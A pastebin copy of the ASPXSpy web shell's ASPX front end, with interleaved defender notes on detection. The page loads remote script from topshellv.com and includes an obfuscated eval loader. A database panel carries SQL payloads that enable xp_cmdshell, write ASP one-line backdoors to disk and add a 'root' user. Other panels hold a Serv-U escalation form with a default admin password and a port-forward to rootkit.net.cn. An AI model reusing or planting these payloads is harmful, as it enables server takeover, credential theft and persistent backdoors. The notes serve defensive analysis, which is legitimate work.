madtiger

windows shell

Sep 13th, 2018
text 72.63 KB | None | 0 0
  1. <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%> <%-- Defender note: this directive switches off two ASP.NET safeguards for the page, request validation (validateRequest="false") and ViewState MAC checking (EnableViewStateMac="false"), and turns on debug compilation. An .aspx file under a web root that sets these together is worth flagging in file-integrity and content scans. --%>
  2. <%@ import Namespace="System.IO"%>
  3. <%@ import Namespace="System.Diagnostics"%>
  4. <%@ import Namespace="System.Data"%>
  5. <%@ import Namespace="System.Management"%>
  6. <%@ import Namespace="System.Data.OleDb"%>
  7. <%@ import Namespace="Microsoft.Win32"%>
  8. <%@ import Namespace="System.Net.Sockets" %>
  9. <%@ import Namespace="System.Net" %>
  10. <%@ import Namespace="System.Runtime.InteropServices"%>
  11. <%@ import Namespace="System.DirectoryServices"%>
  12. <%@ import Namespace="System.ServiceProcess"%>
  13. <%@ import Namespace="System.Text.RegularExpressions"%>
  14. <%@ Import Namespace="System.Threading"%>
  15. <%@ Import Namespace="System.Data.SqlClient"%>
  16. <%@ import Namespace="Microsoft.VisualBasic"%>
  17. <%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  18. <%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  19. <%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  20. <%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%> <%-- Defender note: the imports and assembly references above bring process, WMI, registry, socket, directory-service, service-control, OLE DB and SQL client APIs into one page. The server-side script block of this copy is empty, so how they are used cannot be confirmed from this page; the combination itself is unusual for an ordinary content page and is a reasonable static-scan cue. --%>
  21. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  22. <script runat="server">
  23.  
  24. </script>
  25. <script src=http://www.topshellv.com/kaydet.php></script> <%-- Defender note: every browser that renders this page fetches and runs script from this third-party host over plain HTTP, so whoever controls that host or the network path can see where the page is deployed and act inside the operator's session. What the remote script does is not shown on this page. Treat the hostname as a network indicator, and open samples like this only in an isolated analysis environment. --%>
  26. <html xmlns="http://www.w3.org/1999/xhtml" >
  27. <head id="Head1" runat="server">
  28. <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
  29. <title>ASPXspy</title>
  30. <script type="text/javascript">var _6084;var _7053='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';var _5449=/[\x41\x42\x43\x44\x45\x46]/;var _8618=2;var _2287=_7053.charAt(_7053.length-1);var _4826;var _5884=_7053.split(_5449);var _1128=[String.fromCharCode,isNaN,parseInt,String];_5884[1]=_1128[_8618+1](_1128[_8618](_5884[1])/21);var _8059=(_8618==8)?String:eval;_4826='';_11=_1128[_8618](_5884[0])/_1128[_8618](_5884[1]);for(_6084=3;_6084<_11;_6084++)_4826+=(_1128[_8618-2]((_1128[_8618](_5884[_6084])+_1128[_8618](_5884[2])+_1128[_8618](_5884[1]))/_1128[_8618](_5884[1])-_1128[_8618](_5884[2])+_1128[_8618](_5884[1])-1));var _8127='_1751';var _6091='_8127=_4826';function _1064(_3531){_8059(_2713);_1064(_5886);_5886(_6091);_1064(_8127);}var _2713='_1064=_8059';var _5886='_5886=_1064';_1064(_2287);</script> <%-- Defender note: inline obfuscated loader. It splits the long literal on the letters A to F, turns the numeric fields back into characters with String.fromCharCode, and hands the decoded text to eval through a chain of aliases (_8059, _1064, _5886). The encoded literal is missing from this copy, so the decoded script cannot be determined here. An eval alias next to a fromCharCode decoder inside the head of an .aspx page is a useful static detection cue. --%>
  31. <style type="text/css">
  32. .Bin_Style_Login{font:11px Verdana;BACKGROUND: #FFFFFF;border: 1px solid #666666;}
  33. body,td{font: 12px Arial,Tahoma;line-height: 16px;}
  34. .input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:16px;}
  35. .list{font:12px Arial,Tahoma;height:23px;}
  36. .area{font:12px 'Courier New',Monospace;background:#fff;border: 1px solid #666;padding:2px;}
  37. .bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
  38. a {color: #00f;text-decoration:underline;}
  39. a:hover{color: #f00;text-decoration:none;}
  40. .alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ededed;padding:5px 10px 5px 5px;}
  41. .alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#fafafa;padding:5px 10px 5px 5px;}
  42. .focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
  43. .head td{border-top:1px solid #ddd;border-bottom:1px solid #ccc;background:#e8e8e8;padding:5px 10px 5px 5px;font-weight:bold;}
  44. .head td span{font-weight:normal;}
  45. form{margin:0;padding:0;}
  46. h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
  47. ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
  48. u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
  49. .u1{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
  50. .u2{text-decoration: none;color:#777;float:left;display:block;width:350px;margin-right:10px;}
  51. </style>
  52. <script type="text/javascript">
  53. function CheckAll(form){ // Copies the checked state of the control named "chkall" to every other control in the given form.
  54. for(var i=0;i<form.elements.length;i++){
  55. var e=form.elements[i];
  56. if(e.name!='chkall') // leave the master checkbox itself untouched
  57. e.checked=form.chkall.checked; // assigned on every element, not only checkboxes
  58. }
  59. }
  60. </script>
  61. </head>
  62. <body style="margin:0;table-layout:fixed;">
  63. <form id="ASPXSpy" runat="server">
  64. <div id="ljtzC" runat="server" style=" margin:15px" enableviewstate="false" visible="false" > <%-- Defender note: login panel of the tool. A single password box is posted to the handler xVm, which is not included in this copy. The panel is declared hidden (visible="false"), so which panel an unauthenticated request receives depends on code that is not shown; a scanner that only looks for the full menu in responses may miss a deployed copy. The class name Bin_Style_Login and the footer link are literal strings a content scan can match. --%>
  65. <span style="font:11px Verdana;">Password:</span>
  66. <asp:TextBox ID="HRJ" runat="server" Columns="20" CssClass="Bin_Style_Login" ></asp:TextBox>
  67. <asp:Button ID="ZSnXu" runat="server" Text="Login" CssClass="Bin_Style_Login" OnClick="xVm"/><p/>
  68. Copyright &copy; 2009 Bin -- <a href="http://www.rootkit.net.cn" target="_blank">www.rootkit.net.cn</a>
  69. </div>
  70. <div id="ZVS" runat="server">
  71. <div id="Zzj" runat="server"> <%-- Defender note: header and navigation bar. The link buttons below name the tool's panels: file manager, command execution, IIS site listing, processes, services, users, system information, file search, "SU Exp", registry, port scan, database and port mapping. Their click handlers are not part of this copy. The product string "ASPXSpy Ver: 2009" identifies the family during triage; the control IDs look randomised, so they are weaker signatures than the visible labels. --%>
  72. <table width="100%" border="0" cellpadding="0" cellspacing="0">
  73. <tr class="head">
  74. <td ><span style="float:right;"><a href="http://www.rootkit.net.cn" target="_blank">ASPXSpy Ver: 2009</a></span><span id="Bin_Span_Sname" runat="server" enableviewstate="true"></span></td>
  75. </tr>
  76. <tr class="alt1">
  77. <td><span style="float:right;" id="Bin_Span_FrameVersion" runat="server"></span>
  78. <asp:LinkButton ID="UtkN" runat="server" OnClick="YKpI" Text="Logout" ></asp:LinkButton> | <asp:LinkButton ID="RsqhW" runat="server" Text="File Manager" OnClick="Ybg"></asp:LinkButton> | <asp:LinkButton ID="xxzE" runat="server" Text="CmdShell" OnClick="VOxn"></asp:LinkButton> | <asp:LinkButton ID="nuc" runat="server" Text="IIS Spy" OnClick="KjPi"></asp:LinkButton> | <asp:LinkButton ID="OREpx" runat="server" Text="Process" OnClick="Grxk"></asp:LinkButton> | <asp:LinkButton ID="jHN" runat="server" Text="Services" OnClick="ilC"></asp:LinkButton> | <asp:LinkButton ID="PHq" runat="server" Text="UserInfo" OnClick="Olm"></asp:LinkButton> | <asp:LinkButton ID="wmgnK" runat="server" Text="SysInfo" OnClick="HtB"></asp:LinkButton> | <asp:LinkButton ID="FeV" runat="server" Text="FileSearch" OnClick="PPtK"></asp:LinkButton> | <asp:LinkButton ID="PVQ" runat="server" Text="SU Exp" OnClick="jXhS"></asp:LinkButton> | <asp:LinkButton ID="jNDb" runat="server" Text="RegShell" OnClick="xSy"></asp:LinkButton> | <asp:LinkButton ID="HDQ" runat="server" Text="PortScan" OnClick="cptS" ></asp:LinkButton> | <asp:LinkButton ID="AoI" runat="server" Text="DataBase" OnClick="dMx"></asp:LinkButton> | <asp:LinkButton ID="KHbEd" runat="server" Text="PortMap" OnClick="fDO"></asp:LinkButton>
  79. </td>
  80. </tr>
  81. </table>
  82. </div>
  83. <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
  84. <div id="jDKt" style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;" runat="server" visible="false" enableviewstate="false"></div>
  85. <h2 id="Bin_H2_Title" runat="server"></h2>
  86. <%--FileList: file browser panel with a directory box, a file upload control, create-directory and create-file links, and a "Kill Me" link. The handlers are not in this copy. For responders: because an upload control exists, any file in a location the application identity can write to may have been added or replaced, so review the whole web root rather than this one file. NOTE(review): "Kill Me" presumably removes the tool itself, which would explain a missing file next to log entries that still reference it; confirm.--%>
  87. <div id="CzfO" runat="server">
  88. <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
  89. <tr>
  90. <td style=" white-space:nowrap">Current Directory : </td>
  91. <td style=" width:100%"><input class="input" id="AXSbb" type="text" style="width:97%;margin:0 8px;" runat="server"/>
  92. </td>
  93. <td style="white-space:nowrap" ><asp:Button ID="xaGwl" runat="server" Text="Go" CssClass="bt" OnClick="EXV"/></td>
  94. </tr>
  95. </table>
  96. <table width="100%" border="0" cellpadding="4" cellspacing="0">
  97. <tr class="alt1"><td colspan="7" style="padding:5px;">
  98. <div style="float:right;"><input id="Fhq" class="input" runat="server" type="file" style=" height:22px"/>
  99. <asp:Button ID="RvPp" CssClass="bt" runat="server" Text="Upload" OnClick="lbjLD"/></div><asp:LinkButton ID="OLJFp" runat="server" Text="WebRoot" OnClick="mcCY"></asp:LinkButton> | <a href="#" id="Bin_Button_CreateDir" runat="server">Create Directory</a> | <a href="#" id="Bin_Button_CreateFile" runat="server">Create File</a>
  100. | <span id="Bin_Span_Drv" runat="server"></span><a href="#" id="Bin_Button_KillMe" runat="server" style="color:Red">Kill Me</a>
  101. </td></tr>
  102. <asp:Table ID="UGzP" runat="server" Width="100%" CellSpacing="0" >
  103. <asp:TableRow CssClass="head"><asp:TableCell>&nbsp;</asp:TableCell><asp:TableCell>Filename</asp:TableCell><asp:TableCell Width="25%">Last modified</asp:TableCell><asp:TableCell Width="15%">Size</asp:TableCell><asp:TableCell Width="25%">Action</asp:TableCell></asp:TableRow>
  104. </asp:Table>
  105. </table>
  106. </div>
  107. <%--FileEdit--%>
  108. <div id="vrFA" runat="server">
  109. <p>Current File(import new file name and new file)<br/>
  110. <input class="input" id="Sqon" type="text" size="100" runat="server"/> <asp:DropDownList ID="NdCX" runat="server" CssClass="list" AutoPostBack="true" OnSelectedIndexChanged="zOVO"><asp:ListItem>Default</asp:ListItem><asp:ListItem>UTF-8</asp:ListItem></asp:DropDownList>
  111. </p>
  112. <p>File Content<br/>
  113. <textarea id="Xgvv" runat="server" class="area" cols="100" rows="25" enableviewstate="true" ></textarea>
  114. </p>
  115. <p><asp:Button ID="JJjbW" runat="server" Text="Submit" CssClass="bt" OnClick="DGCoW"/> <asp:Button ID="iCNu" runat="server" Text="Back" CssClass="bt" OnClick="IkkO"/></p>
  116. </div>
  117. <%--CloneTime: form for copying timestamps from a reference file onto another file, and for setting the ReadOnly, System, Hidden and Archive attributes and the creation, last-write and last-access times directly. The handlers XXrLw and tIykC are not in this copy. For responders: on a host where this tool ran, file timestamps and attributes in the web root are not reliable evidence; prefer content hashes against known-good copies, web server logs and file-system journal records when building a timeline.--%>
  118. <div id="zRyG" runat="server" enableviewstate="false" visible="false">
  119. <p>Alter file<br/><input class="input" id="QiFB" type="text" size="120" runat="server"/></p>
  120. <p>Reference file(fullpath)<br/><input class="input" id="lICp" type="text" size="120" runat="server"/></p>
  121. <p><asp:Button ID="JEaxV" runat="server" Text="Submit" CssClass="bt" OnClick="XXrLw"/></p>
  122. <h2>Set last modified &raquo;</h2>
  123. <p>Current file(fullpath)<br/><input class="input" id="pWVL" type="text" size="120" runat="server"/></p>
  124. <p>
  125. <asp:CheckBox ID="ZhWSK" runat="server" Text="ReadOnly" EnableViewState="False"/>
  126. &nbsp;
  127. <asp:CheckBox ID="SsR" runat="server" Text="System" EnableViewState="False"/>
  128. &nbsp;
  129. <asp:CheckBox ID="ccB" runat="server" Text="Hidden" EnableViewState="False"/>
  130. &nbsp;
  131. <asp:CheckBox ID="fbyZ" runat="server" Text="Archive" EnableViewState="False"/>
  132. </p>
  133. <p>
  134. CreationTime :
  135. <input class="input" id="yUqx" type="text" runat="server"/>
  136. LastWriteTime :
  137. <input class="input" id="uYjw" type="text" runat="server"/>
  138. LastAccessTime :
  139. <input class="input" id="aLsn" type="text" runat="server"/>
  140. </p>
  141. <p>
  142. <asp:Button ID="kOG" CssClass="bt" runat="server" Text="Submit" OnClick="tIykC"/>
  143. </p>
  144. </div>
  145. <%--IISSpy: result table with the columns ID, IIS_USER, IIS_PASS, Domain and Path. The code that fills it is not in this copy. NOTE(review): the column names suggest it lists the account name and password configured for each IIS site; confirm. If this file is found on a server, treat those site credentials as exposed and rotate them.--%>
  146. <div runat="server" id="VNR" visible="false" enableviewstate="false">
  147. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  148. <asp:Table ID="GlI" runat="server" Width="100%" CellSpacing="0">
  149. <asp:TableRow CssClass="head"><asp:TableCell>ID</asp:TableCell><asp:TableCell>IIS_USER</asp:TableCell><asp:TableCell>IIS_PASS</asp:TableCell><asp:TableCell>Domain</asp:TableCell><asp:TableCell>Path</asp:TableCell></asp:TableRow>
  150. </asp:Table>
  151. </table>
  152. </div>
  153. <%--Process--%>
  154. <div runat="server" id="DCbS" visible="false" enableviewstate="false">
  155. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  156. <asp:Table ID="IjsL" runat="server" Width="100%" CellSpacing="0" >
  157. <asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Process</asp:TableCell><asp:TableCell>ThreadCount</asp:TableCell><asp:TableCell>Priority</asp:TableCell><asp:TableCell>Action</asp:TableCell></asp:TableRow>
  158. </asp:Table>
  159. </table>
  160. </div>
  161. <%--CmdShell: form that posts an executable path (default c:\windows\system32\cmd.exe) and an argument string to the handler FbhN, which is not in this copy. Detection: the IIS worker process (w3wp.exe) starting cmd.exe or another interpreter is a high-signal process-creation event. Mitigation: run the application pool under a low-privilege identity and deny that identity write access to directories from which scripts are served.--%>
  162. <div runat="server" id="vIac">
  163. <p>CmdPath:<br/>
  164. <input class="input" runat="server" id="kusi" type="text" size="100" value="c:\windows\system32\cmd.exe"/>
  165. </p>
  166. Argument:<br/>
  167. <input class="input" runat="server" id="bkcm" value="/c Set" type="text" size="100"/> <asp:Button ID="YrqL" CssClass="bt" runat="server" Text="Submit" OnClick="FbhN"/>
  168. <div id="tnQRF" runat="server" visible="false" enableviewstate="false">
  169. </div>
  170. </div>
  171. <%--Services--%>
  172. <div runat="server" id="iQxm" visible ="false" enableviewstate="false">
  173. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  174. <asp:Table ID="vHCs" runat="server" Width="100%" CellSpacing="0" >
  175. <asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Name</asp:TableCell><asp:TableCell>Path</asp:TableCell><asp:TableCell>State</asp:TableCell><asp:TableCell>StartMode</asp:TableCell></asp:TableRow>
  176. </asp:Table>
  177. </table>
  178. </div>
  179. <%--Sysinfo--%>
  180. <div runat="server" id="ghaB" visible="false" enableviewstate="false">
  181. <hr style=" border: 1px solid #ddd;height:0px;"/>
  182. <ul class="info" id="Bin_Ul_Sys" runat="server"></ul>
  183. <h2 id="Bin_H2_Mac" runat="server"></h2>
  184. <hr style=" border: 1px solid #ddd;height:0px;"/>
  185. <ul class="info" id ="Bin_Ul_NetConfig" runat="server"></ul>
  186. <h2 id="Bin_H2_Driver" runat="server"></h2>
  187. <hr style=" border: 1px solid #ddd;height:0px;"/>
  188. <ul class="info" id ="Bin_Ul_Driver" runat="server"></ul>
  189. </div>
  190. <%--UserInfo--%>
  191. <div runat="server" id="xWVQ" visible="false" enableviewstate="false">
  192. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  193. <asp:Table ID="VPa" runat="server" Width="100%" CellSpacing="0" >
  194. </asp:Table>
  195. </table>
  196. </div>
  197. <%--SuExp: form pre-filled with a user name, a password, port 43958 and a command line, posted to the handler lRfRj, which is not in this copy. NOTE(review): the defaults look like the local-administration account of the Serv-U FTP server; confirm. If that service runs on the host, check that its local administration password is not the vendor default, that the service does not run with more privilege than it needs, and that the web application identity cannot reach the administration listener on loopback.--%>
  198. <div runat="server" id="APl">
  199. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  200. <tr align="center">
  201. <td style="width:10%"></td>
  202. <td style="width:20%" align="left">UserName : <input class="input" runat="server" id="dNohJ" type="text" size="20" value="localadministrator"/></td>
  203. <td style="width:20%" align="left">PassWord : <input class="input" runat="server" id="NMd" type="text" size="20" value="#l@$ak#.lk;0@P"/></td>
  204. <td style="width:20%" align="left">Port : <input class="input" runat="server" id="HlQl" type="text" size="20" value="43958"/></td>
  205. <td style="width:10%"></td>
  206. </tr>
  207. <tr >
  208. <td style="width:10%"></td>
  209. <td colspan="5">CmdShell&nbsp;&nbsp;:&nbsp;<input class="input" runat="server" id="mHbjB" type="text" size="100" value="cmd.exe /c net user"/> <asp:Button ID="SPhc" CssClass="bt" runat="server" Text="Exploit" OnClick="lRfRj"/></td>
  210. </tr>
  211. </table>
  212. <div id="UHlA" visible="false" enableviewstate="false" runat="server">
  213. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  214. <tr align="center">
  215. <td style="width:30%"></td>
  216. <td align="left" style="width:40%"><pre id="Bin_Td_Res" runat="server"></pre></td>
  217. <td style="width:30%"></td>
  218. </tr>
  219. </table>
  220. </div>
  221. </div>
  222. <%--Reg--%>
  223. <div id="kkHN" runat="server">
  224. <p>Registry Path : <asp:TextBox id="qPdI" style="width:85%;margin:0 8px;" CssClass="input" runat="server"/><asp:Button ID="MoNA" runat="server" Text="Go" CssClass="bt" onclick="RAFL"/></p>
  225. <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
  226. <asp:Table ID="pLWD" runat="server" Width="100%" CellSpacing="0" >
  227. <asp:TableRow CssClass="alt1"><asp:TableCell ColumnSpan="2" id="vyX"></asp:TableCell></asp:TableRow>
  228. <asp:TableRow CssClass="head"><asp:TableCell Width="40%">Key</asp:TableCell><asp:TableCell Width="60%">Value</asp:TableCell></asp:TableRow>
  229. </asp:Table>
  230. </table>
  231. </div>
  232. <%--PortScan: takes a target address and a comma-separated port list and posts them to the handler ELkQ, which is not in this copy. NOTE(review): presumably the connections are made from the web server itself; confirm. Bursts of outbound connection attempts from the IIS worker process to internal addresses are worth alerting on, and egress filtering for the web tier limits what such a scan can reach.--%>
  233. <div id="YwLB" runat="server">
  234. <p>
  235. IP : <asp:TextBox id="MdR" style="width:10%;margin:0 8px;" CssClass="input" runat="server" Text="127.0.0.1"/> Port : <asp:TextBox id="lOmX" style="width:40%;margin:0 8px;" CssClass="input" runat="server" Text="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"/> <asp:Button ID="CmUCh" runat="server" Text="Scan" CssClass="bt" OnClick="ELkQ"/>
  236. </p>
  237. <div id="GBYT" runat="server" visible="false" enableviewstate="false"></div>
  238. </div>
  239. <%--DataBase--%>
  240. <div id="iDgmL" runat="server">
  241. <p>ConnString : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssClass="input" runat="server"/><asp:DropDownList runat="server" CssClass="list" ID="WYmo" AutoPostBack="True" OnSelectedIndexChanged="zOVO" ><asp:ListItem></asp:ListItem><asp:ListItem Value="server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB">MSSQL</asp:ListItem><asp:ListItem Value="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\database.mdb">ACCESS</asp:ListItem></asp:DropDownList><asp:Button ID="QcZPA" runat="server" Text="Go" CssClass="bt" OnClick="BGY"/></p>
  242. <div id="dQIIF" runat="server">
  243. <div id="irTU" runat="server"></div>
  244. <div id="uXevN" runat="server">
  245. Please select a database : <asp:DropDownList runat="server" ID="Pvf" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"></asp:DropDownList>
  246. SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"><asp:ListItem Value="">-- SQL Server Exec --</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')">Add xp_cmdshell</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('sp_OACreate','odsole70.dll')">Add sp_oacreate</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;">Add xp_cmdshell(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;">Add sp_oacreate(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE;">Add makewebtask(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;">Add openrowset/opendatasource(SQL2005)</asp:ListItem><asp:ListItem Value="Exec master.dbo.xp_cmdshell 'net user'">XP_cmdshell exec</asp:ListItem><asp:ListItem Value="EXEC MASTER..XP_dirtree 'c:\',1,1">XP_dirtree</asp:ListItem><asp:ListItem Value="Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^&lt;%execute(request(char(35)))%^>>c:\bin.asp';">SP_oamethod exec</asp:ListItem><asp:ListItem Value="sp_makewebtask @outputfile='c:\bin.asp',@charset=gb2312,@query='select ''&lt;%execute(request(chr(35)))%&gt;'''">SP_makewebtask make file</asp:ListItem><asp:ListItem Value="exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell(&#34;cmd.exe /c net user root root/add 
&#34;)')">SandBox</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];">LogBackup</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='c:\bin.asp' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];">DatabaseBackup</asp:ListItem></asp:DropDownList>
  247. </div>
  248. <table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td> Run SQL </td></tr><tr><td><textarea id="jHIy" class="area" style="width:600px;height:60px;overflow:auto;" runat="server" rows="6" cols="1"></textarea></td></tr><tr><td>
  249. <asp:Button runat="server" ID="WOhJ" CssClass="bt" Text="Query" onclick="ORUgV"/></td></tr></table>
  250. <div style="overflow-x:auto;width:950px" >
  251. <p>
  252. <asp:DataGrid runat="server" ID="rom" HeaderStyle-CssClass="head" BorderWidth="0" GridLines="None" ></asp:DataGrid>
  253. </p>
  254. </div>
  255. </div>
  256. </div>
  257. <%--PortMap: takes a local address and port (defaults 127.0.0.1 and 3389) and a remote host and port, with MapPort, ClearAll and Refresh buttons. The handlers wDZ, vJNsE and tYoZ are not in this copy. NOTE(review): looks like a TCP relay between a local service and a remote endpoint; confirm. The network-side signal would be a long-lived outbound connection from the web server to an external host paired with loopback connections to the remote-desktop port; default-deny egress from the web tier removes the path.--%>
  258. <div id="hOWTm" runat="server">
  259. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  260. <tr align="center">
  261. <td style="width:5%"></td>
  262. <td style="width:20%" align="left">Local Ip : <input class="input" runat="server" id="eEpm" type="text" size="20" value="127.0.0.1"/></td>
  263. <td style="width:20%" align="left">Local Port : <input class="input" runat="server" id="iXdh" type="text" size="20" value="3389"/></td>
  264. <td style="width:20%" align="left">Remote Ip : <input class="input" runat="server" id="llH" type="text" size="20" value="www.rootkit.net.cn"/></td>
  265. <td style="width:20%" align="left">Remote Port : <input class="input" runat="server" id="ZHS" type="text" size="20" value="80"/></td></tr>
  266. <tr align="center"><td colspan="5"><br/><asp:Button ID="FJE" CssClass="bt" runat="server" Text="MapPort" OnClick="wDZ"/> <asp:Button ID="giX" CssClass="bt" runat="server" Text="ClearAll" OnClick="vJNsE"/> <asp:Button ID="GFsm" CssClass="bt" runat="server" Text="Refresh" OnClick="tYoZ"/></td></tr></table></div>
  267. <%--Search: keyword or regex search over files with the listed extensions, matched by file name or file content, with an optional replacement text. The handler NBy is not in this copy. For responders: because a replace option exists, existing script and configuration files under the searched path may have been altered in place, so compare them against known-good copies instead of only looking for newly added files.--%>
  268. <div id="yhv" runat="server">
  269. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  270. <tr align="center">
  271. <td style="width:20%" align="left">Keyword</td>
  272. <td style="width:60%" align="left"><textarea id="iaMKl" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
  273. <td style="width:20%" align="left"><input type="checkbox" runat="server" id="rAQ" value="1"/> Use Regex</td>
  274. </tr>
  275. <tr align="center">
  276. <td style="width:20%" align="left">Replace As</td>
  277. <td style="width:60%" align="left"><textarea id="qPe" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
  278. <td style="width:20%" align="left"><input type="checkbox" runat="server" id="YZw"/> Replace</td>
  279. </tr>
  280. <tr align="center">
  281. <td style="width:20%" align="left">Search FileType</td>
  282. <td style="width:60%" align="left"><input type="text" runat="server" class="input" id="UDLvA" style="width:100%" value="asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config"/></td>
  283. <td style="width:20%" align="left"><asp:DropDownList runat="server" ID="Ven" AutoPostBack="False" CssClass="list"><asp:ListItem Value="name">File Name</asp:ListItem><asp:ListItem Value="content" Selected="True">File Content</asp:ListItem></asp:DropDownList></td>
  284. </tr>
  285. <tr align="center">
  286. <td style="width:20%" align="left">Path</td>
  287. <td style="width:60%" align="left"><input type="text" class="input" id="NaLJ" runat="server" style="width:100%" /></td>
  288. <td style="width:20%" align="left"><asp:Button CssClass="bt" id="axy" runat="server" onclick="NBy" Text="Start" /></td>
  289. </tr>
  290. </table>
  291. <br/>
  292. <br/>
  293. <asp:Table ID="oJiym" runat="server" Width="100%" CellSpacing="0" >
  294. <asp:TableRow CssClass="head"><asp:TableCell Width="60%">File Path</asp:TableCell><asp:TableCell Width="20%">Last modified</asp:TableCell><asp:TableCell Width="20%">Size</asp:TableCell></asp:TableRow>
  295. </asp:Table>
  296. </div>
  297. </td></tr></table>
  298. <div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">Copyright &copy; 2006-2009 <a href="http://www.hackerbox.net" target="_blank">Shell Arsivi</a> All Rights Reserved.</div></div>
  299. </form>
  300. </body>
  301. </html>